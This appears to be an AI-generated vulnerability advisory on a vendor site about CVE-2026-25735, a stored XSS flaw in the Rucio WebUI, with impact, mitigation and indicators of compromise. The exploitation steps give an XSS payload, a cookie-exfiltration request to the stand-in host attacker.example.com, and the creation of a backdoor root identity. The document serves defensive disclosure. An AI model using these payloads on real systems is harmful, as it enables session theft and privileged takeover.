CVE-2026-25735: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-25735 is a Stored Cross-Site Scripting (XSS) vulnerability in the Identity Name field of the Rucio WebUI, a scientific data management platform developed by CERN. Attacker-controlled input submitted as an account identity name is persisted by the backend and later rendered in the WebUI without proper output encoding, enabling arbitrary JavaScript execution in the WebUI origin for any authenticated user who views the affected page. Affected versions include rucio-webui before 35.8.3, versions 36.0.0rc1 through 38.5.3, and versions 39.0.0rc1 through 39.3.0. The vulnerability was published on February 25, 2026, with patches released the same day. It carries a CVSS v3.1 base score of 6.1 (Medium) per the GitHub Advisory, with high confidentiality and integrity impact (GitHub Advisory, Rucio Advisory).

Technical details

The root cause is improper neutralization of user-controlled input during web page generation (CWE-79), compounded by the absence of the HttpOnly flag on session cookies (CWE-1004). An authenticated attacker with sufficient privileges to add an account identity (via Admin > Account Management > Add Account Identity) can submit a JavaScript payload as the identity name via a POST request to /proxy/accounts/{account}/identities. The backend stores this payload without sanitization, and when any user navigates to the account management page (e.g., /ui/account?account={account}), the stored payload is rendered using unsafe DOM methods such as .html() without HTML escaping, triggering execution. The attack requires high privileges to inject the payload but only requires another user to view the affected page to trigger it (GitHub Advisory, Rucio Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the Rucio WebUI origin for any user who views the affected account management page. The impact is amplified by two compounding weaknesses: session cookies lack the HttpOnly flag (making them accessible to JavaScript), and API tokens are exposed to the WebUI via JavaScript variables (e.g., var token = "root-root-webui-..."). Concrete attacker actions include exfiltrating session tokens or API credentials to an external server, creating backdoor UserPass identities with attacker-known passwords, creating or deleting Resource Storage Elements (RSEs), and performing other privileged actions as the victim user — including potentially creating a root-level account (Rucio Advisory).

Exploitability

A proof-of-concept exploit is publicly documented in the GitHub security advisory, including a specific XSS payload capable of creating a root UserPass identity. There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.092% (26th percentile), indicating a low near-term exploitation probability (GitHub Advisory, Rucio Advisory).

Exploitation steps

  1. Authenticate: Log in to the Rucio WebUI with an account that has administrative privileges sufficient to manage account identities.
  2. Navigate to injection point: Go to Admin > Account Management > [Target Account Name] > Add Account Identity.
  3. Inject XSS payload: Submit a POST request to /proxy/accounts/{account}/identities with a malicious JavaScript payload as the identity field value. Example request body: {"identity":"<img src=x onerror=alert(document.cookie)>","authtype":"SSH","email":"test@example.org"}. The server responds with HTTP 201 CREATED, confirming the payload is stored.
  4. Trigger execution: Wait for a target user (e.g., an administrator) to navigate to the account management page at /ui/account?account={account}. The stored payload renders without HTML escaping, executing the JavaScript in the victim's browser.
  5. Exfiltrate session token: Use a more sophisticated payload to read the session cookie (accessible due to missing HttpOnly flag) and send it to an attacker-controlled server: GET https://attacker.example.com/rucio/{BASE64_COOKIE}.
  6. Escalate privileges: Optionally, use the victim's API token (exposed in JavaScript variables) to create a new root-level UserPass identity with an attacker-known password via a PUT /identities/root/userpass request, establishing persistent backdoor access (Rucio Advisory).

Indicators of compromise

  • Network: Unexpected outbound GET requests from the Rucio server or client browsers to unknown external domains with Base64-encoded strings in the URL path (e.g., GET https://attacker.example.com/rucio/<BASE64_STRING>); unusual PUT requests to /identities/root/userpass from WebUI sessions.
  • Logs: WebUI access logs showing POST requests to /proxy/accounts/{account}/identities with HTML/JavaScript content in the request body (e.g., <img, <script, onerror=); unexpected HTTP 201 responses for identity creation with suspicious identity names.
  • Application State: Newly created UserPass identities for the root account or other privileged accounts not created by known administrators; unexpected new account identities with non-standard naming patterns.
  • File System / Config: No direct file system artifacts expected, but review Rucio database records for identity entries containing HTML tags or JavaScript syntax (Rucio Advisory).

Mitigation and workarounds

Upgrade rucio-webui to one of the patched versions: 35.8.3 (for the 35.x LTS branch), 38.5.4 (for the 36.x–38.x branch), or 39.3.1 (for the 39.x branch), all released on February 25, 2026. As defense-in-depth measures, enforce the HttpOnly flag on all session cookies, implement a strict Content Security Policy (CSP), avoid exposing API tokens in JavaScript-accessible variables, and replace unsafe DOM methods like .html() with .text() or sanitized templating. Administrators should also audit existing account identities for any entries containing HTML or JavaScript syntax (Rucio Advisory, Release 35.8.3, Release 38.5.4, Release 39.3.1).

Community reactions

The vulnerability was reported by security researcher d-woosley and published by Rucio maintainer bziemons on February 25, 2026. Red Hat acknowledged the CVE in their security tracking system. No significant broader media coverage or notable community commentary beyond the GitHub advisory has been identified (Rucio Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management